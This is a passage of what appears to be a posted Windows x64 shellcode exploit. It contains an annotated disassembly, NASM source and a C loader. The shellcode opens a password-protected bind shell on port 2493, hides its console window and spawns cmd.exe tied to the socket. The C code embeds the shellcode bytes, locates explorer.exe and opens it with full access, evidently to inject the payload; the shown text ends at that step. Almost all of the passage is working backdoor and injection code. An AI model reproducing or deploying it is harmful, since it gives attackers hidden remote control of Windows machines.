06 mov %dl,0x6(%r12)\r\n 4f: 66 ba 40 03 mov $0x340,%dx\r\n 53: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 56: 48 01 fb add %rdi,%rbx\r\n 59: 49 8d 0c 24 lea (%r12),%rcx\r\n 5d: ff d3 callq *%rbx\r\n 5f: 49 89 c7 mov %rax,%r15\r\n 62: 48 31 d2 xor %rdx,%rdx\r\n 65: b2 88 mov $0x88,%dl\r\n 67: 41 8b 5f 3c mov 0x3c(%r15),%ebx\r\n 6b: 4c 01 fb add %r15,%rbx\r\n 6e: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 71: 4c 01 fb add %r15,%rbx\r\n 74: 44 8b 73 1c mov 0x1c(%rbx),%r14d\r\n 78: 4d 01 fe add %r15,%r14\r\n 7b: 66 ba c8 01 mov $0x1c8,%dx\r\n 7f: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx\r\n 83: 4c 01 fb add %r15,%rbx\r\n 86: 48 31 c9 xor %rcx,%rcx\r\n 89: 66 b9 98 01 mov $0x198,%cx\r\n 8d: 48 29 cc sub %rcx,%rsp\r\n 90: 48 8d 14 24 lea (%rsp),%rdx\r\n 94: 66 b9 02 02 mov $0x202,%cx\r\n 98: ff d3 callq *%rbx\r\n 9a: 48 83 ec 58 sub $0x58,%rsp\r\n 9e: 48 83 ec 58 sub $0x58,%rsp\r\n a2: 48 31 d2 xor %rdx,%rdx\r\n a5: 66 ba 88 01 mov $0x188,%dx\r\n a9: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx\r\n ad: 4c 01 fb add %r15,%rbx\r\n b0: 6a 06 pushq $0x6\r\n b2: 6a 01 pushq $0x1\r\n b4: 6a 02 pushq $0x2\r\n b6: 59 pop %rcx\r\n b7: 5a pop %rdx\r\n b8: 41 58 pop %r8\r\n ba: 4d 31 c9 xor %r9,%r9\r\n bd: 4c 89 4c 24 20 mov %r9,0x20(%rsp)\r\n c2: 4c 89 4c 24 28 mov %r9,0x28(%rsp)\r\n c7: ff d3 callq *%rbx\r\n c9: 49 89 c5 mov %rax,%r13\r\n cc: 41 8b 5e 04 mov 0x4(%r14),%ebx\r\n d0: 4c 01 fb add %r15,%rbx\r\n d3: 6a 10 pushq $0x10\r\n d5: 41 58 pop %r8\r\n d7: 48 31 d2 xor %rdx,%rdx\r\n da: 49 89 14 24 mov %rdx,(%r12)\r\n de: 49 89 54 24 08 mov %rdx,0x8(%r12)\r\n e3: 41 c6 04 24 02 movb $0x2,(%r12)\r\n e8: 66 41 c7 44 24 02 09 movw $0xbd09,0x2(%r12)\r\n ef: bd \r\n f0: 49 8d 14 24 lea (%r12),%rdx\r\n f4: 4c 89 e9 mov %r13,%rcx\r\n f7: ff d3 callq *%rbx\r\n f9: 41 8b 5e 30 mov 0x30(%r14),%ebx\r\n fd: 4c 01 fb add %r15,%rbx\r\n 100: 6a 01 pushq $0x1\r\n 102: 5a pop %rdx\r\n 103: 4c 89 e9 mov %r13,%rcx\r\n 106: ff d3 callq *%rbx\r\n 108: 48 83 ec 58 sub $0x58,%rsp\r\n 10c: eb 12 jmp 120 <a>\r\n \r\n000000000000010e <kick>:\r\n 10e: 48 83 c4 58 add $0x58,%rsp\r\n 112: 41 8b 5e 08 mov 0x8(%r14),%ebx\r\n 116: 4c 01 fb add %r15,%rbx\r\n 119: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 11e: ff d3 callq *%rbx\r\n \r\n0000000000000120 <a>:\r\n 120: 41 8b 1e mov (%r14),%ebx\r\n 123: 4c 01 fb add %r15,%rbx\r\n 126: 48 31 d2 xor %rdx,%rdx\r\n 129: 49 89 14 24 mov %rdx,(%r12)\r\n 12d: 49 89 54 24 08 mov %rdx,0x8(%r12)\r\n 132: b2 10 mov $0x10,%dl\r\n 134: 52 push %rdx\r\n 135: 4c 8d 04 24 lea (%rsp),%r8\r\n 139: 49 8d 14 24 lea (%r12),%rdx\r\n 13d: 4c 89 e9 mov %r13,%rcx\r\n 140: ff d3 callq *%rbx\r\n 142: 49 89 44 24 f8 mov %rax,-0x8(%r12)\r\n 147: 41 8b 5e 48 mov 0x48(%r14),%ebx\r\n 14b: 4c 01 fb add %r15,%rbx\r\n 14e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 153: 41 c7 04 24 2d 2d 3e movl $0x203e2d2d,(%r12)\r\n 15a: 20 \r\n 15b: 49 8d 14 24 lea (%r12),%rdx\r\n 15f: 6a 04 pushq $0x4\r\n 161: 41 58 pop %r8\r\n 163: 4d 31 c9 xor %r9,%r9\r\n 166: 48 83 ec 58 sub $0x58,%rsp\r\n 16a: ff d3 callq *%rbx\r\n 16c: 41 8b 5e 3c mov 0x3c(%r14),%ebx\r\n 170: 4c 01 fb add %r15,%rbx\r\n 173: 4d 31 c9 xor %r9,%r9\r\n 176: 6a 08 pushq $0x8\r\n 178: 41 58 pop %r8\r\n 17a: 49 8d 14 24 lea (%r12),%rdx\r\n 17e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 183: ff d3 callq *%rbx\r\n 185: 41 81 3c 24 68 32 37 cmpl $0x31373268,(%r12)\r\n 18c: 31 \r\n 18d: 0f 85 7b ff ff ff jne 10e <kick>\r\n 193: 41 81 7c 24 04 35 30 cmpl $0x46383035,0x4(%r12)\r\n 19a: 38 46 \r\n 19c: 0f 85 6c ff ff ff jne 10e <kick>\r\n 1a2: 8b 5e 44 mov 0x44(%rsi),%ebx\r\n 1a5: 48 01 fb add %rdi,%rbx\r\n 1a8: ff d3 callq *%rbx\r\n 1aa: 48 31 d2 xor %rdx,%rdx\r\n 1ad: 41 c7 04 24 75 73 65 movl $0x72657375,(%r12)\r\n 1b4: 72 \r\n 1b5: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)\r\n 1bc: 32 \r\n 1bd: 41 88 54 24 06 mov %dl,0x6(%r12)\r\n 1c2: 49 8d 0c 24 lea (%r12),%rcx\r\n 1c6: 48 83 ec 58 sub $0x58,%rsp\r\n 1ca: 66 ba 40 03 mov $0x340,%dx\r\n 1ce: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 1d1: 48 01 fb add %rdi,%rbx\r\n 1d4: ff d3 callq *%rbx\r\n 1d6: 49 89 c6 mov %rax,%r14\r\n 1d9: 41 c7 04 24 46 69 6e movl $0x646e6946,(%r12)\r\n 1e0: 64 \r\n 1e1: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)\r\n 1e8: 6e 64 \r\n 1ea: 41 c7 44 24 08 6f 77 movl $0x4141776f,0x8(%r12)\r\n 1f1: 41 41 \r\n 1f3: 41 80 74 24 0b 41 xorb $0x41,0xb(%r12)\r\n 1f9: 48 31 d2 xor %rdx,%rdx\r\n 1fc: 66 ba 2c 09 mov $0x92c,%dx\r\n 200: 44 8b 2c 16 mov (%rsi,%rdx,1),%r13d\r\n 204: 49 01 fd add %rdi,%r13\r\n 207: 49 8d 14 24 lea (%r12),%rdx\r\n 20b: 4c 89 f1 mov %r14,%rcx\r\n 20e: 41 ff d5 callq *%r13\r\n 211: 48 31 d2 xor %rdx,%rdx\r\n 214: 41 c7 04 24 43 6f 6e movl $0x736e6f43,(%r12)\r\n 21b: 73 \r\n 21c: 41 c7 44 24 04 6f 6c movl $0x57656c6f,0x4(%r12)\r\n 223: 65 57 \r\n 225: 41 c7 44 24 08 69 6e movl $0x6f646e69,0x8(%r12)\r\n 22c: 64 6f \r\n 22e: 41 c7 44 24 0c 77 43 movl $0x616c4377,0xc(%r12)\r\n 235: 6c 61 \r\n 237: 66 41 c7 44 24 10 73 movw $0x7373,0x10(%r12)\r\n 23e: 73 \r\n 23f: 41 88 54 24 12 mov %dl,0x12(%r12)\r\n 244: 49 8d 0c 24 lea (%r12),%rcx\r\n 248: 48 83 ec 58 sub $0x58,%rsp\r\n 24c: ff d0 callq *%rax\r\n 24e: 48 31 d2 xor %rdx,%rdx\r\n 251: 41 c7 04 24 53 68 6f movl $0x776f6853,(%r12)\r\n 258: 77 \r\n 259: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)\r\n 260: 6e 64 \r\n 262: 66 41 c7 44 24 08 6f movw $0x776f,0x8(%r12)\r\n 269: 77 \r\n 26a: 41 88 54 24 0a mov %dl,0xa(%r12)\r\n 26f: 49 8d 14 24 lea (%r12),%rdx\r\n 273: 4c 89 f1 mov %r14,%rcx\r\n 276: 41 55 push %r13\r\n 278: 5b pop %rbx\r\n 279: 49 89 c5 mov %rax,%r13\r\n 27c: ff d3 callq *%rbx\r\n 27e: 4c 89 e9 mov %r13,%rcx\r\n 281: 48 31 d2 xor %rdx,%rdx\r\n 284: ff d0 callq *%rax\r\n 286: 4d 31 c0 xor %r8,%r8\r\n 289: 41 50 push %r8\r\n 28b: 5a pop %rdx\r\n 28c: 66 ba 1f 04 mov $0x41f,%dx\r\n 290: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 293: 48 01 fb add %rdi,%rbx\r\n 296: 41 50 push %r8\r\n 298: 5a pop %rdx\r\n 299: b2 80 mov $0x80,%dl\r\n 29b: 49 8d 0c 24 lea (%r12),%rcx\r\n 29f: ff d3 callq *%rbx\r\n 2a1: 48 31 d2 xor %rdx,%rdx\r\n 2a4: 41 c7 44 24 f4 63 6d movl $0x41646d63,-0xc(%r12)\r\n 2ab: 64 41 \r\n 2ad: 41 88 54 24 f7 mov %dl,-0x9(%r12)\r\n 2b2: b2 68 mov $0x68,%dl\r\n 2b4: 49 89 14 24 mov %rdx,(%r12)\r\n 2b8: b2 ff mov $0xff,%dl\r\n 2ba: 48 ff c2 inc %rdx\r\n 2bd: 49 8b 44 24 f8 mov -0x8(%r12),%rax\r\n 2c2: 41 89 54 24 3c mov %edx,0x3c(%r12)\r\n 2c7: 49 89 44 24 50 mov %rax,0x50(%r12)\r\n 2cc: 49 89 44 24 58 mov %rax,0x58(%r12)\r\n 2d1: 49 89 44 24 60 mov %rax,0x60(%r12)\r\n 2d6: 48 83 ec 58 sub $0x58,%rsp\r\n 2da: 48 31 c9 xor %rcx,%rcx\r\n 2dd: 4d 31 c9 xor %r9,%r9\r\n 2e0: 6a 01 pushq $0x1\r\n 2e2: 41 58 pop %r8\r\n 2e4: 4c 89 44 24 20 mov %r8,0x20(%rsp)\r\n 2e9: 48 89 4c 24 28 mov %rcx,0x28(%rsp)\r\n 2ee: 48 89 4c 24 30 mov %rcx,0x30(%rsp)\r\n 2f3: 48 89 4c 24 38 mov %rcx,0x38(%rsp)\r\n 2f8: 49 8d 14 24 lea (%r12),%rdx\r\n 2fc: 48 89 54 24 40 mov %rdx,0x40(%rsp)\r\n 301: 49 8d 54 24 68 lea 0x68(%r12),%rdx\r\n 306: 48 89 54 24 48 mov %rdx,0x48(%rsp)\r\n 30b: 4d 31 c0 xor %r8,%r8\r\n 30e: 49 8d 54 24 f4 lea -0xc(%r12),%rdx\r\n 313: 4d 31 d2 xor %r10,%r10\r\n 316: 66 41 ba 94 02 mov $0x294,%r10w\r\n 31b: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx\r\n 31f: 48 01 fb add %rdi,%rbx\r\n 322: ff d3 callq *%rbx\r\n 324: 48 31 d2 xor %rdx,%rdx\r\n 327: 52 push %rdx\r\n 328: 66 ba 29 01 mov $0x129,%dx\r\n 32c: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 32f: 48 01 fb add %rdi,%rbx\r\n 332: 59 pop %rcx\r\n 333: 48 83 c4 58 add $0x58,%rsp\r\n 337: ff d3 callq *%rbx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n \r\n \r\n/*\r\n \r\nsection .text\r\n global _start\r\n_start:\r\n \r\n \r\ncdq\r\nmov dl, 128\r\n \r\nsub rsp,rdx\r\nlea r12,[rsp]\r\n \r\n \r\n \r\nxor rdx,rdx\r\n \r\nmov rax,[gs:rdx+0x60]\r\nmov rax,[rax+0x18]\r\nmov rsi,[rax+0x10]\r\nlodsq\r\nmov rsi,[rax]\r\nmov rdi,[rsi+0x30] ;kernel32.dll base address\r\n \r\n \r\n;-----------------------------------------\r\n \r\nmov dl,0x88\r\nmov ebx,[rdi+0x3c]\r\nadd rbx,rdi\r\nmov ebx,[rbx+rdx]\r\nadd rbx,rdi\r\n \r\n \r\nmov esi,[rbx+0x1c] ;kernel32.dll AddressOfFunctions\r\nadd rsi,rdi\r\n \r\n \r\n;=============================================MAIN CODE====================================================;\r\n \r\n \r\n \r\n;loading ws2_32.dll\r\n \r\nxor rdx,rdx\r\n \r\n \r\n \r\n \r\nmov [r12],dword 'ws2_'\r\nmov [r12+4],word '32'\r\nmov [r12+6],byte dl\r\n \r\nmov dx,832\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nlea rcx,[r12]\r\ncall rbx\r\n \r\nmov r15,rax ;ws2_32.dll base Address\r\n;---------------------------\r\nxor rdx,rdx\r\nmov dl,0x88\r\nmov ebx,[r15+0x3c]\r\nadd rbx,r15\r\nmov ebx,[rbx+rdx]\r\nadd rbx,r15\r\n \r\nmov r14d,[rbx+0x1c]\r\nadd r14,r15 ;ws2_32.dll AddressOfFunctions\r\n \r\n;---------------------------------------------\r\n;WSAStartup(514,&WSADATA)\r\n \r\n \r\n \r\nmov dx,114*4\r\nmov ebx,[r14+rdx]\r\nadd rbx,r15\r\n \r\nxor rcx,rcx\r\nmov cx,408\r\n \r\nsub rsp,rcx\r\nlea rdx,[rsp]\r\nmov cx,514\r\n \r\n \r\n \r\ncall rbx\r\n \r\n;---------------------------------------------\r\n;WSASocketA(2,1,6,0,0,0)\r\nsub rsp,88\r\nsub rsp,88\r\nxor rdx,rdx\r\nmov dx,98*4\r\nmov ebx,[r14+rdx]\r\nadd rbx,r15\r\n \r\npush 6\r\npush 1\r\npush 2\r\n \r\npop rcx\r\npop rdx\r\npop r8\r\n \r\nxor r9,r9\r\n \r\nmov [rsp+32],r9\r\nmov [rsp+40],r9\r\n \r\ncall rbx\r\n \r\nmov r13,rax ;SOCKET\r\n;----------------------------------------------------------------\r\n;--------------------------------------------------\r\nmov ebx,[r14+4]\r\nadd rbx,r15 ;bind()\r\n \r\n;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)\r\n \r\n \r\npush 16\r\npop r8\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12],rdx\r\nmov [r12+8],rdx\r\n \r\nmov [r12],byte 2\r\nmov [r12+2],word 0xbd09 ;port 2493 (change it if U want)\r\nlea rdx,[r12]\r\n \r\nmov rcx,r13\r\n \r\ncall rbx\r\n \r\n;---------------------------------------------------------\r\nmov ebx,[r14+48]\r\nadd rbx,r15 ;listen()\r\n \r\n;listen(SOCKET,1)\r\n \r\npush 1\r\npop rdx\r\n \r\nmov rcx,r13\r\ncall rbx\r\n \r\nsub rsp,88\r\n \r\njmp a\r\n;------------------------------------------------\r\n;-----------------------------------------\r\nkick:\r\nadd rsp,88\r\n \r\nmov ebx,[r14+8]\r\nadd rbx,r15 ;CloseSocket()\r\n \r\nmov rcx,[r12-8]\r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\n \r\n;-----------------------------------\r\na:\r\n \r\n \r\n \r\nmov ebx,[r14]\r\nadd rbx,r15 ;accept()\r\n \r\n;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12],rdx\r\nmov [r12+8],rdx\r\n \r\nmov dl,16\r\npush rdx\r\n \r\nlea r8,[rsp]\r\n \r\n \r\nlea rdx,[r12]\r\n \r\nmov rcx,r13\r\n \r\n \r\ncall rbx\r\n \r\nmov [r12-8],rax ;client socket\r\n;--------------------------\r\n;send(SOCKET,string,4,0)\r\nmov ebx,[r14+72]\r\nadd rbx,r15 ;send()\r\n \r\n \r\nmov rcx,[r12-8]\r\nmov [r12],dword 0x203e2d2d\r\nlea rdx,[r12]\r\n \r\npush byte 4\r\npop r8\r\n \r\nxor r9,r9\r\nsub rsp,88\r\ncall rbx\r\n \r\n;-------------------------------------------\r\n \r\nmov ebx,[r14+60]\r\nadd rbx,r15 ;recv()\r\n \r\nxor r9,r9\r\npush byte 8\r\npop r8\r\nlea rdx,[r12]\r\nmov rcx,[r12-8]\r\ncall rbx\r\n \r\n;------------------------\r\n;password: h271508F\r\n \r\ncmp dword [r12],'h271'\r\njne kick\r\ncmp dword [r12+4],'508F'\r\njne kick\r\n \r\n \r\n \r\n;----------------------------------------------\r\n;hiding window \r\n \r\nmov ebx,[rsi+68]\r\nadd rbx,rdi\r\n \r\ncall rbx ;AllocConsole()\r\n \r\n;---------------------------------------\r\nxor rdx,rdx\r\n \r\n;loading user32.dll\r\nmov [r12],dword 'user'\r\nmov [r12+4],word '32'\r\nmov [r12+6],byte dl\r\n \r\nlea rcx,[r12]\r\n \r\nsub rsp,88 ;reserving memory for API \r\n \r\nmov dx,832\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\ncall rbx ;LoadLibraryA(\"user32\")\r\n \r\nmov r14,rax ;user32.dll base\r\n \r\n;----------------------------------------------------------------\r\n;--------------------------------------\r\n;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n;Finding address of FindWindowA()\r\nmov [r12],dword 'Find'\r\nmov [r12+4],dword 'Wind'\r\nmov [r12+8],dword 'owAA'\r\nxor byte [r12+11],0x41\r\n \r\nxor rdx,rdx\r\nmov dx,587*4\r\nmov r13d,[rsi+rdx]\r\nadd r13,rdi ;GetProcAddress() (temporary)\r\n \r\n \r\nlea rdx,[r12]\r\nmov rcx,r14\r\n \r\ncall r13\r\n \r\n;--------------------------------------\r\n;-------------------------------------------------\r\n \r\n;FindWindowA(\"ConsoleWindowClass\",NULL)\r\nxor rdx,rdx\r\n \r\nmov [r12],dword 'Cons'\r\nmov [r12+4],dword 'oleW'\r\nmov [r12+8],dword 'indo'\r\nmov [r12+12],dword 'wCla'\r\nmov [r12+16],word 'ss'\r\nmov [r12+18],byte dl\r\n \r\nlea rcx,[r12]\r\nsub rsp,88\r\ncall rax\r\n \r\n;----------------------------------\r\n;===========================================================\r\n \r\nxor rdx,rdx\r\n \r\n;finding Address of ShowWindow()\r\nmov [r12],dword 'Show'\r\nmov [r12+4],dword 'Wind'\r\nmov [r12+8],word 'ow'\r\nmov [r12+10],byte dl\r\n \r\nlea rdx,[r12]\r\nmov rcx,r14\r\n \r\npush r13\r\npop rbx \r\n \r\nmov r13,rax ;HWND\r\n \r\ncall rbx\r\n \r\n;-------------------------------------\r\nmov rcx,r13\r\nxor rdx,rdx\r\n \r\ncall rax\r\n;----------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n;--------------------------------------\r\n;RtlFillMemory(address,length,fill)\r\nxor r8,r8\r\npush r8\r\npop rdx\r\n \r\nmov dx,1055\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\npush r8\r\npop rdx\r\n \r\nmov dl,128\r\n \r\nlea rcx,[r12]\r\n \r\ncall rbx\r\n;----------------------------------------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n;----------------------------------------------------------------\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12-12],dword 'cmdA'\r\nmov [r12-9],byte dl\r\n \r\n \r\nmov dl,104\r\n \r\nmov [r12],rdx\r\nmov dl,255\r\ninc rdx\r\n \r\n \r\nmov rax,[r12-8]\r\n \r\nmov [r12+0x3c],edx\r\n \r\nmov [r12+0x50],rax\r\nmov [r12+0x58],rax\r\nmov [r12+0x60],rax\r\n \r\n;---------------------------------------------------\r\n;CreateProcessA(NULL,\"cmd\",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)\r\n \r\nsub rsp,88\r\n \r\nxor rcx,rcx\r\nxor r9,r9\r\n \r\n \r\npush 1\r\npop r8\r\n \r\nmov [rsp+32],r8\r\nmov [rsp+40],rcx\r\nmov [rsp+48],rcx\r\nmov [rsp+56],rcx\r\n \r\nlea rdx,[r12]\r\nmov [rsp+64],rdx\r\nlea rdx,[r12+104]\r\nmov [rsp+72],rdx\r\n \r\n \r\n \r\n \r\nxor r8,r8\r\nlea rdx,[r12-12]\r\n \r\nxor r10,r10\r\nmov r10w,165*4\r\nmov ebx,[rsi+r10]\r\nadd rbx,rdi ;CreateProcessA()\r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\n;------------------------------------------------------\r\n \r\n \r\n;------------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nxor rdx,rdx\r\npush rdx\r\n \r\nmov dx,297\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\npop rcx\r\nadd rsp,88\r\ncall rbx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n#include<tlhelp32.h>\r\n \r\nchar shellcode[]=\\\r\n \r\n\"\\x99\\xb2\\x80\\x48\\x29\\xd4\\x4c\\x8d\\x24\\x24\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x70\\x10\\x48\\xad\\x48\\x8b\\x30\\x48\\x8b\\x7e\\x30\\xb2\\x88\\x8b\\x5f\\x3c\\x48\\x01\\xfb\\x8b\\x1c\\x13\\x48\\x01\\xfb\\x8b\\x73\\x1c\\x48\\x01\\xfe\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x77\\x73\\x32\\x5f\\x66\\x41\\xc7\\x44\\x24\\x04\\x33\\x32\\x41\\x88\\x54\\x24\\x06\\x66\\xba\\x40\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0c\\x24\\xff\\xd3\\x49\\x89\\xc7\\x48\\x31\\xd2\\xb2\\x88\\x41\\x8b\\x5f\\x3c\\x4c\\x01\\xfb\\x8b\\x1c\\x13\\x4c\\x01\\xfb\\x44\\x8b\\x73\\x1c\\x4d\\x01\\xfe\\x66\\xba\\xc8\\x01\\x41\\x8b\\x1c\\x16\\x4c\\x01\\xfb\\x48\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x8d\\x14\\x24\\x66\\xb9\\x02\\x02\\xff\\xd3\\x48\\x83\\xec\\x58\\x48\\x83\\xec\\x58\\x48\\x31\\xd2\\x66\\xba\\x88\\x01\\x41\\x8b\\x1c\\x16\\x4c\\x01\\xfb\\x6a\\x06\\x6a\\x01\\x6a\\x02\\x59\\x5a\\x41\\x58\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c\\x24\\x28\\xff\\xd3\\x49\\x89\\xc5\\x41\\x8b\\x5e\\x04\\x4c\\x01\\xfb\\x6a\\x10\\x41\\x58\\x48\\x31\\xd2\\x49\\x89\\x14\\x24\\x49\\x89\\x54\\x24\\x08\\x41\\xc6\\x04\\x24\\x02\\x66\\x41\\xc7\\x44\\x24\\x02\\x09\\xbd\\x49\\x8d\\x14\\x24\\x4c\\x89\\xe9\\xff\\xd3\\x41\\x8b\\x5e\\x30\\x4c\\x01\\xfb\\x6a\\x01\\x5a\\x4c\\x89\\xe9\\xff\\xd3\\x48\\x83\\xec\\x58\\xeb\\x12\\x48\\x83\\xc4\\x58\\x41\\x8b\\x5e\\x08\\x4c\\x01\\xfb\\x49\\x8b\\x4c\\x24\\xf8\\xff\\xd3\\x41\\x8b\\x1e\\x4c\\x01\\xfb\\x48\\x31\\xd2\\x49\\x89\\x14\\x24\\x49\\x89\\x54\\x24\\x08\\xb2\\x10\\x52\\x4c\\x8d\\x04\\x24\\x49\\x8d\\x14\\x24\\x4c\\x89\\xe9\\xff\\xd3\\x49\\x89\\x44\\x24\\xf8\\x41\\x8b\\x5e\\x48\\x4c\\x01\\xfb\\x49\\x8b\\x4c\\x24\\xf8\\x41\\xc7\\x04\\x24\\x2d\\x2d\\x3e\\x20\\x49\\x8d\\x14\\x24\\x6a\\x04\\x41\\x58\\x4d\\x31\\xc9\\x48\\x83\\xec\\x58\\xff\\xd3\\x41\\x8b\\x5e\\x3c\\x4c\\x01\\xfb\\x4d\\x31\\xc9\\x6a\\x08\\x41\\x58\\x49\\x8d\\x14\\x24\\x49\\x8b\\x4c\\x24\\xf8\\xff\\xd3\\x41\\x81\\x3c\\x24\\x68\\x32\\x37\\x31\\x0f\\x85\\x7b\\xff\\xff\\xff\\x41\\x81\\x7c\\x24\\x04\\x35\\x30\\x38\\x46\\x0f\\x85\\x6c\\xff\\xff\\xff\\x8b\\x5e\\x44\\x48\\x01\\xfb\\xff\\xd3\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x75\\x73\\x65\\x72\\x66\\x41\\xc7\\x44\\x24\\x04\\x33\\x32\\x41\\x88\\x54\\x24\\x06\\x49\\x8d\\x0c\\x24\\x48\\x83\\xec\\x58\\x66\\xba\\x40\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\xff\\xd3\\x49\\x89\\xc6\\x41\\xc7\\x04\\x24\\x46\\x69\\x6e\\x64\\x41\\xc7\\x44\\x24\\x04\\x57\\x69\\x6e\\x64\\x41\\xc7\\x44\\x24\\x08\\x6f\\x77\\x41\\x41\\x41\\x80\\x74\\x24\\x0b\\x41\\x48\\x31\\xd2\\x66\\xba\\x2c\\x09\\x44\\x8b\\x2c\\x16\\x49\\x01\\xfd\\x49\\x8d\\x14\\x24\\x4c\\x89\\xf1\\x41\\xff\\xd5\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x43\\x6f\\x6e\\x73\\x41\\xc7\\x44\\x24\\x04\\x6f\\x6c\\x65\\x57\\x41\\xc7\\x44\\x24\\x08\\x69\\x6e\\x64\\x6f\\x41\\xc7\\x44\\x24\\x0c\\x77\\x43\\x6c\\x61\\x66\\x41\\xc7\\x44\\x24\\x10\\x73\\x73\\x41\\x88\\x54\\x24\\x12\\x49\\x8d\\x0c\\x24\\x48\\x83\\xec\\x58\\xff\\xd0\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x53\\x68\\x6f\\x77\\x41\\xc7\\x44\\x24\\x04\\x57\\x69\\x6e\\x64\\x66\\x41\\xc7\\x44\\x24\\x08\\x6f\\x77\\x41\\x88\\x54\\x24\\x0a\\x49\\x8d\\x14\\x24\\x4c\\x89\\xf1\\x41\\x55\\x5b\\x49\\x89\\xc5\\xff\\xd3\\x4c\\x89\\xe9\\x48\\x31\\xd2\\xff\\xd0\\x4d\\x31\\xc0\\x41\\x50\\x5a\\x66\\xba\\x1f\\x04\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x41\\x50\\x5a\\xb2\\x80\\x49\\x8d\\x0c\\x24\\xff\\xd3\\x48\\x31\\xd2\\x41\\xc7\\x44\\x24\\xf4\\x63\\x6d\\x64\\x41\\x41\\x88\\x54\\x24\\xf7\\xb2\\x68\\x49\\x89\\x14\\x24\\xb2\\xff\\x48\\xff\\xc2\\x49\\x8b\\x44\\x24\\xf8\\x41\\x89\\x54\\x24\\x3c\\x49\\x89\\x44\\x24\\x50\\x49\\x89\\x44\\x24\\x58\\x49\\x89\\x44\\x24\\x60\\x48\\x83\\xec\\x58\\x48\\x31\\xc9\\x4d\\x31\\xc9\\x6a\\x01\\x41\\x58\\x4c\\x89\\x44\\x24\\x20\\x48\\x89\\x4c\\x24\\x28\\x48\\x89\\x4c\\x24\\x30\\x48\\x89\\x4c\\x24\\x38\\x49\\x8d\\x14\\x24\\x48\\x89\\x54\\x24\\x40\\x49\\x8d\\x54\\x24\\x68\\x48\\x89\\x54\\x24\\x48\\x4d\\x31\\xc0\\x49\\x8d\\x54\\x24\\xf4\\x4d\\x31\\xd2\\x66\\x41\\xba\\x94\\x02\\x42\\x8b\\x1c\\x16\\x48\\x01\\xfb\\xff\\xd3\\x48\\x31\\xd2\\x52\\x66\\xba\\x29\\x01\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x59\\x48\\x83\\xc4\\x58\\xff\\xd3\";\r\n \r\n \r\nint main()\r\n{\r\n HANDLE s,proc;\r\n PROCESSENTRY32 ps;\r\n BOOL process_found=0;\r\n LPVOID shell;\r\n SIZE_T total;\r\n \r\n //finding explorer.exe pid\r\n \r\n ps.dwSize=sizeof(ps);\r\n \r\n s=CreateToolhelp32Snapshot(2,0);\r\n \r\n if(s==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n if(!Process32First(s,&ps))\r\n {\r\n printf(\"Process32First() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n \r\n do{\r\n if(0==strcmp(ps.szExeFile,\"explorer.exe\"))\r\n {\r\n process_found=1;\r\n break;\r\n }\r\n }while(Process32Next(s,&ps));\r\n \r\n \r\n if(!process_found)\r\n {\r\n printf(\"Unknown Process\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n //opening process using pid \r\n \r\n \r\n proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);\r\n \r\n if(proc==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"OpenProcess() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n } \r\n \r\n \r\n 